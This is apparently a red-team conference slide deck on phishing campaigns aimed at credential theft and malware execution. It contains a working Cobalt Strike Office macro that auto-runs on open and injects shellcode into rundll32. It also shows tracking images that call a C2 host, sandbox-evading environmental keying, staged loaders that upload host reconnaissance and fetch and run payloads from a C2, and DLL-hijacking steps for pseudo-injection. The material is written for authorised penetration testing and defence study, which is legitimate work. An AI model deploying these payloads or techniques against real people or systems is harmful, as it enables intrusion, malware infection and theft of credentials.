intro
- @magnusstubman
- pentester / red teamer @ improsec
Goals
- Credential theft
- Malware execution
Credential theft when
- DMZ system allows single-factor juicy systems
- citrix
- vpn
- vSphere
- source code repository (svn, git)
- ftp (crushftp)
- e-mail for internal phishing? (Ruler)
- no external password spraying
- really???
Malware execution
Malware execution - Office macros
full source @ dumpco.re/slides/phishing/cobaltstrike-macro.vbs
| myArray = Array(-4,-24,8, ...shellcode...) | |
| If Len(Environ("ProgramW6432")) > 0 Then | |
| sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe" | |
| Else | |
| sProc = Environ("windir") & "\\System32\\rundll32.exe" | |
| End If | |
| res = CreateProcessA(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo) | |
| rwxpage = VirtualAllocEx(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40) | |
| For offset = LBound(myArray) To UBound(myArray) | |
| myByte = myArray(offset) | |
| res = WriteProcessMemory(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&) | |
| Next offset | |
| res = CreateRemoteThread(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0) | |
| End Sub | |
| Sub AutoOpen() | |
| Auto_Open | |
| End Sub | |
| Sub Workbook_Open() | |
| Auto_Open | |
| End Sub | |
- email scanning products?
- sandbox?
- suspicious user reporting it?
- AV/EDR?
if you don't know
you will get burned
Reconnaissance
OSINT Reconnaissance
Preliminary phishing
legitimate email w. a question + tracking image:
gives external IP address and AD domain name, that can be used as environmental keys to defeat (most) sandboxes/email scanning products
< img src="http://c2/heartbeat1.png" style="height:0px; width:0px;">
access.log:
81.214.8.247 - - [22/mar/2021:04:49:52 +0100] "GET /heartbeat1.png http/1.1" 302 525 "-" "mozilla..
Environmental keying
make your paylaod such that it:
1. gets external IP-address/domain name
2. use it as an encryption key to decrypt malware
Pseudocode#1:
encryptionKey = getIPaddress()
encryptedMalware = "\x3a\x94\x90\xde\xad\0xbe. . ."
malware = decrypt(encryptedMalware, encryptionKey)
execute(malware)
Pseudocode#2:
encryptionKey = getDomainName()
encryptedMalware = "\x3a\x94\x90\xde\xad\0xbe. . ."
malware = decrypt(encryptedMalware, encryptionKey)
execute(malware)
..which leaves us:
- suspicious user reporting it?
- AV/EDR?
heartbeat
Did the user..
1. read the e-mail?
2. click the link?
3. open the document?
4. enable macros?
1. Did the user read the e-mail?
add html image tag to the e-mail:
< img src="http://c2/heartbeat1.png" style="height:0px; width:0px;">
1. Did the user read the e-mail?
add html image tag to the e-mail:
< img src="http://c2/heartbeat1.png" style="height:0px; width:0px;">
access.log:
81.214.8.247 - - [22/mar/2021:04:49:52 +0100] "GET /heartbeat1.png http/1.1" 302 525 "-" "mozilla/5.0 (x11; ubuntu; linux x86_64; rv:62.0) gecko/20100101 firefox/62.0"
2. Did the user click the link?
use unique links for each phishing e-mail:
http://payloadhost/totally-legit/legit-document.docx?employeeId=9t3y49tgy3
2. Did the user click the link?
use unique links for each phishing e-mail:
http://payloadhost/totally-legit/legit-document.docx?employeeId=9t3y49tgy3
access.log:
81.214.8.247 - - [22/mar/2021:04:49:52 +0100] "GET /totally-legit/legit-document.docx?employeeId=9t3y49tgy3 http/1.1" 302 525 "-" "mozilla/5.0 (x11; ubuntu; linux x86_64; rv:62.0) gecko/20100101 firefox/62.0"
3. Did the user open the document?
Add 'external image' that loads when document opens:
(1/3)
3. Did the user open the document?
Add 'external image' that loads when document opens:
(2/3)
3. Did the user open the document?
Add 'external image' that loads when document opens:
(3/3)
access.log:
81.214.8.247 - - [22/mar/2021:04:49:52 +0100] "GET /img/windbg-hooked-process.png http/1.1" 302 525 "-" "mozilla/5.0 (x11; ubuntu; linux x86_64; rv:62.0) gecko/20100101 firefox/62.0"
4. Did the user enable macros?
Add macro that loads 'external image':
(1/2)
4. Did the user enable macros?
Add macro that loads 'external image':
(2/2)
access.log:
81.214.8.247 - - [22/mar/2021:04:49:52 +0100] "GET /img/macro-triggered.png http/1.1" 302 525 "-" "mozilla/5.0 (x11; ubuntu; linux x86_64; rv:62.0) gecko/20100101 firefox/62.0"
- email scanning products?
- sandbox?
- suspicious user reporting it?
- AV/EDR?
- email scanning products?
- sandbox?
- suspicious user reporting it?
- AV/EDR? <- how do we reduce likelihood?
Test AV/EDR in
offline lab environment
problems:
- which AV/EDR?
- Trial version?
- Pirate it?
- Buy it?
Flammable Phishing
Strategy:
make it OK that your payload gets burned
(or at least less painful)
by making more, throwaway payloads that
tell us what's on the host, so we can bypass it
- performs host reconnaissance (av/edr, third party apps, hardening configs, etc), uploads to C2
- periodically attempts to download & execute something from C2
- cheap to develop -> more okay if it gets burned
- tells us what defense solutions they have -> enables us to test/bypass in offline lab
- (and potentially prepare privesc exploits, so we can operate quickly when we land)
- we can wait and deploy 2nd stage malware when we are ready, or ignore if we think it's a sandbox/analysis environment
- (maybe skip preliminary phishing entirely?)
Terminology
stage0 -> stage1 -> stage2
Terminology
stage0 -> stage1 -> stage2
- stage0: code execution aka "loader" - allow us to execute something
- doc/lnk/hta/js/+++
- stage1: basic access and (maybe) persistence
- basic malware, few capabilities (e.g. SilentBreakSecurity's Throwback)
- stage2: fully operational malware
- all required capabilities we need to achieve goals (Cobalt Strike, Slingshot, etc)
Cobalt strike's default macro
slide#5 - https://dumpco.re/slides/phishing/cobaltstrike-macro.vbs
- stage0: Office file with macro that spawns rundll32.exe and injects Cobalt Strike beacon
- stage2: Cobalt Strike Beacon running
Flammable Phishing strategy example
- stage0 & stage1 in one file: HTA file that:
- Enumerate installed software, and send info to C2
- Execute anything that C2 sends back, check continuously and wait
Example: https://gist.github.com/magnusstubman/d12c7cc6b4a12a5bd1843c021c03a252
Flammable Phishing strategy example#2
- stage0: LNK file with powershell download cradle
- stage1: download and execute cheap/throwaway/flammable payload
- stage2: load purpose-built stage2 malware based on recon from stage1 that has been tested/bypassed in offline lab environment
Flammable Phishing strategy example#3
- stage0: Word macro that use DotNetToJs to spawn stage1
- stage1: Throwback, which can load arbitrary DLLs via sRDI to spawn stage2
- stage2: Slingshot, Cobalt Strike, etc
Summary
- If you don't know what went wrong, you can't fix it
- your phishing will (usually) fail/burn to begin with
- Make "discount" malware - doesnt hurt as much when it burns
ty
@magnusstubman
Misc
Discount PPID spoofing
real PPID spoofing https://github.com/christophetd/spoofing-office-macro
Discount "process injection"
via DLL hijacking
E.g. "inject" into notepad.exe
- copy notepad.exe to writable folder, e.g. %TEMP%
- write malicious version.dll (or other dll loaded by notepad) to %TEMP%
- execute %TEMP%\notepad.exe
ty again
@magnusstubman